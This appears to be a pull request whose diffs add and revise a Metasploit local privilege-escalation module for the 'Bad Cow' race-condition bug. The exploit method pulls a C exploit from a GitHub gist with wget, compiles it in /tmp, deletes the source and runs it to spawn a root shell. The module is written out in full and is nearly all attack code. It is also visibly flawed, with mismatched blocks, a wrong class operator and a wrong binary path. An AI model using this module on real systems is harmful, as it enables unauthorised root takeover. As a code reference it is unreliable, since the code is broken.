### PR TITLE
Add badcow web download script

### DIFF
--- a/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
+++ b/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
@@ -50,15 +50,19 @@ class Metasploit3 > Msf::Exploit::Local
           exec('wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c') #get code from github
         rescue Exception => e1
           print_error("Could not fetch script on target machine. (GitHub could be blocked?)")
+        end
+		
         begin
           print_status("Compiling...")
           exec('gcc cowroot.c -o /tmp/cowroot -pthread') #compile it
           exec('rm -rf cowroot.c') #remove it once it's done compiling
         rescue Exception => e2
           print_error("Unable to compile script")
+        end
+		
         begin
           exec('./tmp/cowroot') #run it
         rescue Exception => e3
           print_error("Error running compiled program")
-
+        end
       #TODO: test if /tmp programs are executable by non-root users

--- a/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
+++ b/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
@@ -1,0 +1,64 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# Author: Carter Brainerd
+##
+
+require 'msf/core'
+
+class Metasploit3 > Msf::Exploit::Local
+    Rank = ExcellentRanking
+
+    #TODO: check these
+    include Msf::Exploit::EXE
+    include Msf::Post::File
+      def initialize(info = {})
+        super(update_info(info,
+            'Name'          => 'Bad Cow x64 Race Condition local privelege escalation',
+            'Description'   => %q{
+              This module exploits the well known \"Bad Cow\" Race Condition privelege escalation vulnerability.
+              This will work if you are an unprivelaged user, but will not work if you are root (for abvious reasons).
+              In short, the module will spawn a root shell just for you :)
+              NOTE: This module will get a C file from github and compile it ON THE SYSTEM
+            },
+            'Author'         =>
+                  [
+                      'Robin Verton(https://github.com/rverton)',         # Original Exploit
+                      'Carter Brainerd(https://github.com/thecarterb)'        # MSF Module
+                  ],
+            'Targets'       =>
+              [
+                ['Linux x86_64', {'Arch' => ARCH_X86_64}],
+              ],
+          ],
+            'Priveleged'    => false,
+            'References'    => 'https://www.exploit-db.com/exploits/40616/',
+            'License'       => MSF_LICENSE,
+            'DefaultTarget' => 0 ))
+
+          register_options(
+          [
+              OptString.new('SESSION', [true], 'Session to run script. Shell or meterpreter.')
+          ]
+          )
+    end
+
+    def exploit
+        begin
+          print_status("Getting script from GitHub...")
+          exec('wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c') #get code from github
+        rescue Exception => e1
+          print_error("Could not fetch script on target machine. (GitHub could be blocked?)")
+        begin
+          print_status("Compiling...")
+          exec('gcc cowroot.c -o /tmp/cowroot -pthread') #compile it
+          exec('rm -rf cowroot.c') #remove it once it's done compiling
+        rescue Exception => e2
+          print_error("Unable to compile script")
+        begin
+          exec('./tmp/cowroot') #run it
+        rescue Exception => e3
+          print_error("Error running compiled program")
+
+      #TODO: test if /tmp programs are executable by non-root users

--- a/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
+++ b/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
@@ -7,7 +7,7 @@
 
 require 'msf/core'
 
-class Metasploit3 > Msf::Exploit::Local
+class MetasploitModule > Msf::Exploit::Local
     Rank = ExcellentRanking
 
     #TODO: check these

--- a/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
+++ b/modules/exploits/linux/local/bad_cow_privilege_escalation.rb
@@ -5,19 +5,15 @@
 # Author: Carter Brainerd
 ##
 
-require 'msf/core'
-
-class MetasploitModule > Msf::Exploit::Local
+class MetasploitModule < Msf::Exploit::Local
     Rank = ExcellentRanking
 
-    #TODO: check these
-    include Msf::Exploit::EXE
-    include Msf::Post::File
+    include Msf::Post::Linux::Privilege
       def initialize(info = {})
         super(update_info(info,
             'Name'          => 'Bad Cow x64 Race Condition local privelege escalation',
             'Description'   => %q{
-              This module exploits the well known \"Bad Cow\" Race Condition privelege escalation vulnerability.
+              This module exploits the well known "Bad Cow" Race Condition privelege escalation vulnerability.
               This will work if you are an unprivelaged user, but will not work if you are root (for abvious reasons).
               In short, the module will spawn a root shell just for you :)
               NOTE: This module will get a C file from github and compile it ON THE SYSTEM
@@ -35,6 +31,7 @@ class MetasploitModule > Msf::Exploit::Local
             'Priveleged'    => false,
             'References'    => 'https://www.exploit-db.com/exploits/40616/',
             'License'       => MSF_LICENSE,
+            'DisclosureDate'=> "Oct 18 2016",
             'DefaultTarget' => 0 ))
 
           register_options(
@@ -42,7 +39,7 @@ class MetasploitModule > Msf::Exploit::Local
               OptString.new('SESSION', [true], 'Session to run script. Shell or meterpreter.')
           ]
           )
-    end
+      end
 
     def exploit
         begin
@@ -51,7 +48,7 @@ class MetasploitModule > Msf::Exploit::Local
         rescue Exception => e1
           print_error("Could not fetch script on target machine. (GitHub could be blocked?)")
         end
-		
+
         begin
           print_status("Compiling...")
           exec('gcc cowroot.c -o /tmp/cowroot -pthread') #compile it
@@ -59,7 +56,7 @@ class MetasploitModule > Msf::Exploit::Local
         rescue Exception => e2
           print_error("Unable to compile script")
         end
-		
+
         begin
           exec('./tmp/cowroot') #run it
         rescue Exception => e3


### PR DESCRIPTION
Adds a module to download bad cow from GitHub. It compiles it, then deletes the source

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/local/bad_cow_privilege_escalation`
- [ ] `set SESSION 1`
- [ ] `exploit`


